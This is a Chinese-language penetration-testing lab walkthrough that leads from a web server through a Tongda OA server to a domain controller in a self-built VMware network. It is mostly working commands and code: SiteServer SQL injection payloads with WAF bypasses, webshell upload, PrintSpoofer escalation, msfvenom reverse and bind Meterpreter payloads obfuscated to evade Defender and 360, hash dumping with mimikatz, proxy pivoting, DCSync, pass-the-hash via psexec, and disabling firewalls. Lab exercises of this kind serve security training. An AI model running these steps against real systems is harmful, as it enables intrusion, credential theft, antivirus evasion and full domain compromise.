项目-内网域渗透

1.1 拓扑

kali 的ip为192.168.0.122

路线：stack hacker->web服务器->oa办公系统->域控

1.2搭建

VMware虚拟网络编辑器加两个虚拟网卡：

10.10.1.0 仅主机模式

10.10.10.0

win2016 dc、win2016 web、win2016 oa都要写好账号和密码

web服务器双网卡

第一块桥接ip段：192.168.0.0/24

第二块网卡：10.10.1.0/24

oa服务器

10.10.1.0/24

10.10.10.0/24

dc域控

10.10.10.0/24

对于外网114，无法通过ping它，因为114开了防火墙，可以通过访问该ip，确认其环境无问题

内网防火墙设置了禁用ping命令，web机与OA无法互相ping，访问其80端口即可

域控没有防火墙，没禁用ping，可以在OA服务器，ping它

1.3 利用

外网篇

1.3.1 主机发现

打开kali，进行主机发现

netdiscover -i eth0 -r 192.168.0.0/24

得到ip地址

192.168.0.114

ps:

内网用netdiscover(kali与web服务器同网段)

外网就ping，或者网站查询

1.3.2 端口扫描

masscan -p 1-65535 192.168.0.114 --rate=100

rate，避免防火墙发现

扫描结果为

端口：80,6588，999,21，5985，3389

nmap对端口进行深度扫描

nmap -A -p 80,6588，999,21，5985，3389 192.168.0.114 -sV -oA test1

对端口的进一步描述：服务，组件，文件，cpe信息，robots.txt，host等

系统的名称，版本等信息

发现了目标机使用的dns解析的地址信息，可以进行域名绑定

1.3.3 美化扫描报告

此时呢，会出现test1命名的三个文件，其中有一个后缀为.xml的

加入模板文件mode.xsl，输入

xsltproc -o test1.html mode.xsl test1.xml 

firefox test1.html

1.3.4 编写目录扫描工具过防火墙

kali做个hosts绑定

vi /etc/hosts

192.168.0.114 www.example.com

访问网址

url输入 and 1=1，出现安全狗拦截标志

如果目标开启了安全狗的防火墙（抗CC）

御剑（即使将线程数调低）等工具扫描出路径后，访问时，会被安全狗拦截，并提示访问频繁，会被锁ip

kali vi一个dirscan.py文件，且已有一个目录字典bing.txt

#conding:utf-8
import requests
import time
import sys

with open('bing,txt','r',encoding='UTF-8') as readfile:
	for dirs in readfile.readlines():
        url="http://www.example.com/"+dirs.strip('\n')
        resp=requests.get(url)
        strlen=len(resp.text)
        print(url+'---'+str(resp.status_code)+'--len--'+str(strlen))
        time.sleep(0.5)
        if resp.status_code==200 or resp.status_code==403 or resp.status_code==301 or resp.status_code==500:
            with open('write.txt','a',encoding='UTF-8') as writefile:
                writefile.write(url+'---'+str(resp.status_code)+'--len--'+str(strlen)+'\n')
   

python3 dirscan.py运行

找到了robots.txt

可以访问看看

有三个:

/SiteServer/

/SiteFiles/

/UserCenter/

也可以执行 cat write.txt | grep 500

找到的是：

http: //www .example.com/siteserver—500–len–4254

1.3.5 找cms的利用poc找注入点

并进行网址访问 http://www.example.com/siteserver

自动加载为 http://www.example.com/siteserver/login.aspx

是一个叫做 siteserver的 管理员后台登录网页，且给出了对应版本3.6.4

去google啊，或者github搜一个这种相应版本的cms，没有的话去找一找github的扫描器比如w9scan，去找有无对应siteserver的poc，即py脚本

代码列举了可能的注入语句

#!/usr/bin/evn python
#-*-:coding:utf-8 -*-
#Author:404
#Name:siteserver最新版3.6.4 sql inject漏洞大礼包of 1
#Refer:http://www.wooyun.org/corps/%E7%99%BE%E5%AE%B9%E5%8D%83%E5%9F%9F%E8%BD%AF%E4%BB%B6%E6%8A%80%E6%9C%AF%E5%BC%80%E5%8F%91%E6%9C%89%E9%99%90%E8%B4%A3%E4%BB%BB%E5%85%AC%E5%8F%B8/page/2


def assign(service,arg):
    if service=="siteserver":
        return True,arg 


def  audit(arg):
    ps=[
        'siteserver/service/background_taskLog.aspx?Keyword=test%%27%20and%20convert(int,(char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version))=1%20and%202=%271&DateFrom=&DateTo=&IsSuccess=All',
        'usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=2;%20--',
        'siteserver/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%202=%271',
        'siteserver/userRole/background_administrator.aspx?RoleName=%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%201=%271&PageNum=0&Keyword=test&AreaID=0&LastActivityDate=0&Order=UserName',
        'siteserver/userRole/background_user.aspx?PageNum=0&Keyword=%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%201=%27&CreateDate=0&LastActivityDate=0&TypeID=0&DepartmentID=0&AreaID=0',
        'siteserver/bbs/background_thread.aspx?UserName=test&Title=%27%20and%201=char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version%20and%201=%27&DateFrom=&DateTo=&ForumID=0',
        ]
    for p in ps:
        url=arg+p
        code,head,res,errcode,_=curl.curl2(url)
        
        if code==500 and "GAOJIMicrosoft" in res:
            security_hole(url)
        
        
if __name__=="__main__":
    from dummy import *
    audit(assign('siteserver','http://www.plhgyy.com/')[1])
    #audit(assign('siteserver','http://www.zgktws.com/')[1])

代码复制到kali，更改代码的url部分，改为目标网址，找到状态码为500的注入语句。

#!/usr/bin/evn python
#-*-:coding:utf-8 -*-
#Author:404
#Name:siteserver最新版3.6.4 sql inject漏洞大礼包of 1
#Refer:http://www.wooyun.org/corps/%E7%99%BE%E5%AE%B9%E5%8D%83%E5%9F%9F%E8%BD%AF%E4%BB%B6%E6%8A%80%E6%9C%AF%E5%BC%80%E5%8F%91%E6%9C%89%E9%99%90%E8%B4%A3%E4%BB%BB%E5%85%AC%E5%8F%B8/page/2
import requests

ps=[
        'siteserver/service/background_taskLog.aspx?Keyword=test%%27%20and%20convert(int,(char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version))=1%20and%202=%271&DateFrom=&DateTo=&IsSuccess=All',
        'usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=2;%20--',
        'siteserver/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%202=%271',
        'siteserver/userRole/background_administrator.aspx?RoleName=%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%201=%271&PageNum=0&Keyword=test&AreaID=0&LastActivityDate=0&Order=UserName',
        'siteserver/userRole/background_user.aspx?PageNum=0&Keyword=%27%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=1%20and%201=%27&CreateDate=0&LastActivityDate=0&TypeID=0&DepartmentID=0&AreaID=0',
        'siteserver/bbs/background_thread.aspx?UserName=test&Title=%27%20and%201=char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version%20and%201=%27&DateFrom=&DateTo=&ForumID=0',
]
for p in ps: 
    url='http://www.example.com/'+p
    res=requests.get(url)
	if res.status_code==500 and "GAOJIMicrosoft" in res.text:
        print(url)
        print(res.text)

python3 该代码后，

结果为：

http://www.example.com/usercenter/platform/
user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)%2B@@version=2;%20--

char(71)%2Bchar(65)%2Bchar(79)%2Bchar(74)%2Bchar(73)对应为：

GAOJI

sql注入

访问该语句，由于@@version=2网页报错回显了数据库的版本信息

Microsoft SQL server 2008 R2(SP2)

尝试更改语句包含db_name:

http://www.example.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20db_name=2;%20--

db_name=2，被iis安全狗拦截了该语句

这个时候通过 ~ 取反 绕过

http://www.example.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20db_name=~2;%20--

参考链接

按位取反

sql注入过狗

回显报错，而不是安全狗的拦截，显示可以过拦截

http://www.example.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20@@version=~2;%20--

在将nvarchar值 ‘Microsoft SQL server 2008 R2(SP2)’ …转化成数据类型int失败

数据库用户密码

http://www.example.com/usercenter/platform/user.aspx?UnLock=sdfe%27&UserNameCollection=test%27)%20and%20user=~2;%20--

由于user这个字段，目标的数据库是没有的，所以报错了

在将nvarchar值’msmoonlab’转换成数据类型int时失败

这个时候一般要通过字典去跑字段、表名

为了演示，直接在目标机的数据库取出来(比如字段：username、password、passwordsalt…)

当然，已知siteserver框架，数据结构可以搜索引擎搜索

尝试下列语句，被iis安全狗拦截了

...and (select top 1 username from bairong_Administrator)=~1;...

尝试下列语句，为字段加上中括号，也被iis安全狗拦截了

...and (select top 1 [username] from [bairong_Administrator])=~1;...

过防火墙的拦截

尝试取反放在前面，回显报错，得到了username为amin

...and ~1=(select top 1 username from [bairong_Administrator]);...

在将nvarchar值’admin’转化成数据类型int时失败

尝试下列语句，回显报错，得到了password为’一段哈希值’

...and ~1=(select top 1 password from [bairong_Administrator]);...

得到密文为：

….值’64…w==’…

同理得到密码盐passwordsalt

…pg==

加密格式为Encrypted(‘明文’,’salt’)

猜测加密方式为：

base64(Encrypted('明文','salt'))

1.3.6 dnSpy 查找dll的加解密

由于嘞，已知login.aspx，所以知道是.NET类型的，而dnSpy是对.NET程序的反编译工具，源代码审计了，全局查找

在后台登录，随便登录一下，开发者工具的网络查看该请求的流向，依然是login.aspx，

找到真正加密与解密的类，而不是调用的

1.3.7 编写密文解密工具

用microsoft vs 新建一个windows窗体程序，

拖取了4个textbox控件(密文,slat,明文,错误信息)，一个button按钮

将解密的代码复制过来，button方法去调用该解密方法，启动程序

输入密文和salt，点击button，显示明文得 admin5566

1.3.8 找回密码漏洞

siteserver cms提供了找回密码功能，仅提供用户名，之后回答密保问题即可

那么burpsuite去抓包拦截一下，将问题的答案置为空，可以得到真实密码 admin5566

登录进去后，该cms的站点模块管理，有导入站点模板功能，可以上传zip文件。直接去内容模块上传文件，比如图片，那些会被安全狗锁死

现有一个过狗的aspx文件，压缩后上传，上传后该cms会自动解压的，得到aspx文件。

这里为了演示方便，直接获得了该cms的文件存储路径

攻击者访问这个路径下的aspx文件，网页会报错

这个时候找 过狗 工具连接即可，(但中国菜刀和蚁剑连接会被安全狗拦截)，csdn有的大佬用的冰蝎的马，貌似也过了

1.3.9 siteserver后台 getshell

过狗工具(如冰蝎)切换到终端，

输入systeminfo 查看系统信息

ipconfig /all 发现两块网卡

输入 netstat -ano 查看开放的端口

net start查看开放的服务，比如能看到安全狗服务之类的

whoami /all查看用户信息/组/特权信息

SeImpersonatePrivilege 身份验证后模拟客户端 已启用 这个服务能够帮助我们提权

tasklist查看进程，找到存在的防护软件

1.3.10 printSpoofer的提权

目的是上传该软件到目标机，并运行，提权成system

由于该服务器上有安全狗等防护软件，增加用户的话可能被拦截。

也有dll动态链接库来做反弹的、但是这种上传上去就会被安全狗杀

所以最好上远控，但是嘞，杀软defender存在， 所以要免杀。

将找到的Print Spooler免杀 通过过狗工具(如冰蝎)进行文件上传，注意上传到 即使是最小权限用户也能读能执行的目录下，那就是 C:/Windows/Temp目录

在其虚拟终端中运行一下，查看权限

printspoofer1.exe -i -c "whoami"

ps:

使用教程
https://github.com/itm4n/PrintSpoofer

1.3.11 msf shellcode绕过windows defender查杀

1.3.11.1 msf生成免杀攻击载荷

在kali运行以下代码，lhost是kali的ip

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.122 lport=2333 -e x86/shikata_ga_nai -i 15 -f csharp -o payload.txt 

用掩日工具对payload.txt的内容进行shellcode编译，语言c#，另存为p1.exe文件(起一个notepad等常见的名字最好)

ps:

工具地址

kali打开msfconsole

反向连接

use exploit/multi/handler #监听模块
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.122
set lport 2333
show options
exploit -j

利用过狗工具嘞，上传p1.exe，且在虚拟终端上用printSpoofer工具运行该软件

printspoofer1.exe -i -c "p1.exe"

kali会生成会话，进入控制端

sysinfo 得到系统信息

hashcat破解web服务器的hash

kali里在监听处，输入ps查看进程

找一个x64的administrator进程，进行迁移

注入系统进程

migrate 2292

获取哈希

hashdump(需要system权限)

显示的为 服务器hash信息内容

也可以用：

load mimikatz

help

kerberos

wdigest

netstat一下，看看端口

发现3389端口是开着的

www.cmd5.com是可以破解哈希的

也可以用hashcat

将获取的某一条hash值存进hash.txt，得到的字典为rockyou.txt

hashcat -a 0 -m 1000 hash.txt rockyou.txt --force

-a 0是字典模式

-m 是类型

hash.txt是ntml

内网篇

登录远程桌面

其实可以远程连接哈，已经破解了web服务器的Administrator的hash密码了

在主机进行连接即可，输入目标ip，用户名，还有密码

连接后，进行清除痕迹、关闭安全狗

内网渗透

kali在监听的模块里，

可以ifconfig，查看web服务器是否在域内，有10.10.1.131

netstat查看是否有连接内网的

跨网段横向渗透

内网ping协议发现主机

对10.10.1.0/24 进行横向渗透 首先获取这个段下的pc

在meterpreter > 输入shell

运行以下语句：

for /l %i in (1,1,255) do @ ping 10.10.1.%i -w l -n l|find /i "ttl="

或者不进入shell

使用扫描模块

run arp_scanner -r 10.10.1.0/24

扫描到 10.10.1.130 与本机的131

设置代理nmap对跨网段主机端口

kali想要对10.10.1.130操作，需要在web服务器上做代理

kali重新利用模块

use auxiliary/server/socks4a
show options //显示了端口为1080
exploit

另开一个终端端口

vi /etc/proxychains.conf

更改内容：

socks4 192.168.0.122 1080

在上述socks4a模块exploit后，输入

sessions 3

msf添加路由

run autoroute -s 10.10.1.0/24
run autoroute -p
use auxiliary/server/socks4a

在kali新终端调用

proxychains3 nmap -sT -Pn 10.10.1.130 -p 80

如果信息里有个”OK“，表示可以用kali对10.10.1.130操作了

proxychains3 firefox http://10.10.1.130

显示了一个通达OA网络智能办公室系统登录界面

端口查询

proxychains3 nmap -sT -Pn 10.10.1.130 -p80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,6379,7001,7002,9200,9300,11121,27017,27018,50000,50070,50030,21,22,23,2601,3389 --open

只开放了80端口，考虑做了端口访问控制

配置蚁剑代理并连接小马

去github找通达的exp/poc，clone下来，找到exp.py文件

用蚁剑生成shell

通过kali进行编码

echo "shell内容" | base64

将编码的内容替换掉exp.py中的编码内容即可

代理运行

proxychains python exp.py -H http://10.10.1.130 -file-shell

给了个最终路径结果

http ://10.10.1.130/ispirit/interface/xiaoma.php

去访问这个路径

然后蚁剑配置下代理

socks4协议，代理服务器为192.168.0.122，端口1080

蚁剑去连接就可以了

对通达OA服务器信息收集

在蚁剑的虚拟终端中，输入如下信息

ipconfig /all > cmd.txt
net start > cmd.txt
tasklist > cmd.txt
netstat -ano >> cmd.txt
systeminfo >> cmd.txt
net user >> cmd.txt

在蚁剑中找到该txt，进行查看

命令行关闭OA系统防火墙

在蚁剑的虚拟终端中

netsh advfirewall set allprofiles //查看防火墙状态
netsh advfirewall set allprofiles state off

这样kali就可以访问除80以外的端口，可以正向连接OA服务器

然后去kali，执行

proxychains3 nmap -sT -Pn 10.10.1.130 -p 445

msf正向木马免杀过360全家桶

生成攻击载荷：

msfvenom -p windows/x64/meterpreter/bind_tcp lport=6666 -e x86/shikata_ga_nai -i 15 -f csharp -o payload_bind.txt 

将txt的内容复制，用掩日免杀生成bind.exe

将这个弄到一个有360的虚拟机中，发现是被查杀了的

改为-i 12重复一遍，b.exe也查杀了

kali进入msf

exploit multi/handler 
set lport 6666
set rhost 10.10.1.130

show options
exploit

将b.exe拖进蚁剑里，蚁剑的终端运行一下该软件，没有查杀

此时kali

进入了meterpreter >

ipconfig

发现了ip 130 还有166

说明已经拿到OA主机的权限了

回到蚁剑的终端，看OA服务器是否通网

curl http://www.baidu.com > cmd.txt

没结果，不通网，那360只能查杀一些已有的

收集整理分析内网域的信息

还在meterpreter >

hashdump

失败了

ps，找到一个x64位的程序，如1048

migrate 1048

hashdump，获取到了hash值

load mimikatz

msv

显示了域名，用户名，密码是看不了的

sysinfo

操作系统，域名等

定位是否是一个域控环境

还在meterpreter >

shell

来到OA的终端

发现有乱码情况

输入 chcp 65001，设置编码

使用 net time，确认域控时间

假如是在域控的主机、就会返回域控的同步时间

Current time at \\dc.attack.local is …

也可以用模块定位域内pc

meterpreter > run post /windows/gather/enum_domain

发现了域控的ip。。。165

查看登录过的用户：

继续在shell情况下：

cd c:\

dir

dir Users

或者在meterpreter >情况下：

run post/..../enum_logged_on_users

查看组信息：

run post/..../enum_ad_groups

查看域内信息

run post/..../enum_domain_tokens

可以查看到有的进程，是域管理员在线的

进入shell，查看域基础信息

shell

chcp 65001

net user

net view /domain

nltest /domain_trusts

net config workstation

net user /domain

net group /domain

net localgroup administrators /domain //登录该台服务器的域管理员

net group “domain admins” /domain

net group “domain controllers” /domain

net view /domain:attack

net view /domain:attack.local

whoami

显示是系统权限

exit

ps

跨网段探测DC端口

可以看到有的进程是域管理员在线的，选择x64的，比如3196

窃取它的token

steal_token 3196

getuid

权限变成了一个域的管理员连接，就可以去访问它的dir，木马写进去执行，得到域控权限

但是继续shell的话，分配失败，

whoami

仍然是system权限

dir \\DC\c$ 不允许

回到 meterpreter>

先取消刚刚窃取的administrato的shell

rev2self终结权限

getuid 变回system权限

访问域控信息

在10.10.1.130的机器上添加一条10.10.10.0/24的静态路由、以便我们访问域控的10.10.10.的机器

run autoroute -s 10.10.10.0/24

新开的kali端口进行nmap扫描，域控一般开放88端口(kerberos的)

proxychains nmap对域控

proxychains3 nmap -sT -Pn 10.10.10.165 -p 88

proxychains3 nmap -sT -Pn 10.10.10.165 -p80,88，89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984,6379,7001,7002,9200,9300,11121,27017,27018,50000,50070,50030,21,22,23,2601,3389 --open

开放了88，3389啊，445，135啊端口

利用kiwi dcsync ntlm获取

获取域用户的PID SID的NTML

meterpreter> 中

sysinfo

Meterpreter是x86

ps

找到x64的进程，迁移一下

migrate xxx

load mimikatz

load kiwi

help

getuid //现在是system权限

dcsync_ntlm administrator //该权限不起作用

ps 

//还是要找一个域管理员权限的x64

steal_token xxxx

dcsync_ntlm administrator

//显示了域管理员的哈希
/*
Account
NTLM Hash
LM Hash
SID
RID
*/

dcsync_ntlm  krbtgt

background

/*
以下msf能使用的条件：
①开启445端口SMB服务（默认开启）
②开启admin$共享
*/
search psexec

use exploit/.../smb/psexec

show options

set RHOSTS 10.10.10.165

set smbpass 为域管理员的NTLM哈希

set smbuser administrator

show options

exploit 

sessions

//有7,8,9 三个 

sessions 9

getuid
//server username: ATTACK\administrator

登录域控管理员

做一个pth登录

内网横向之PTH

https://blog.csdn.net/qq_46258964/article/details/124655483

https://www.geekby.site/2019/04/pthpass-the-hash-%E6%94%BB%E5%87%BB/

过程

https://github.com/sssssanr/Mimikatz-Csharp

原理是：反射PE注入将mimikatz加载到内存运行

dll不会被杀，行为查杀，不会拦截

• 打开windows powershell生成key.snk
• 将key.snk和下载好的katz.cs复制到Microsoft.NET对应文件夹(C:\Windows\Microsoft.NET\Framework\v4.0.30319 记为path)
• 打开cmd后，
• cd path
• csc.exe /r:… (复制其CscCsc编译成DLL下的命令) //csc.exe是C#编译器

生成了一个regsvcs.dll，可以避免被杀

建议是在windows server 2012这样的老机器上运行的一般win10运行会出错 如果运行的时候错误说缺少“System.IO.Compression.dll”文件、我们只需要去下载即可

• regsvcs.exe regsvcs.dll

有一个PtH功能(Pass The Hash) 哈希传递

将这个dll给kali，

kali在meterpreter下

upload regsvcs.dll c:/windows/temp/

(上传到了10.10.1.130的机器那去了，可以通过蚁剑看到)

shell

chcp 65001

tasklist //看下进程，有没有cmd.exe

cd ../temp //切换到有regsvcs.dll的文件夹下
C:/Windows/Microsoft.NET/Fra../v4.0.../RegSvcs.exe regsvcs.dll

进入到mimikatz #
mimikatz sekurlsa::pth/user:administrator/domain:attack.local/ntlm:c7078b8300f0eacbffe68981cc733ee4 

//显示的有ERROR 失败了

失败了

破解域控NTML并登录域控

www.cmd5.com，破解出来了，付费即可

用主机的windows做个代理

在kali中

proxychains3 rdesktop 10.10.10.165

连接失败

必须要windows的终端

工具名为SocksCap64，启动

win+r 输入mstsc，拉进上个程序中即可

代理配置为192.168.0.122 1080 SOCKS4

在隧道中运行远程桌面连接

输入10.10.10.165

用户名：administrator，输入密码

进入域控的cmd.exe

dir

type flag.txt

总结

正向连接、反向连接、socks代理

网络不稳定、操作被拦截，控制的会掉，timed out

那还是从反向连接开始，msf弄好，exploit，然后过狗webshell工具的虚拟终端运行事先上传进去的木马，这边kali就会获取到几个session，且进meterpreter，随便取一个即可，比如 session 8，

继续添加路由

run autoroute -s 10.10.1.0/24

background

然后改为正向连接…exploit，

蚁剑控制的虚拟终端中去运行对应的木马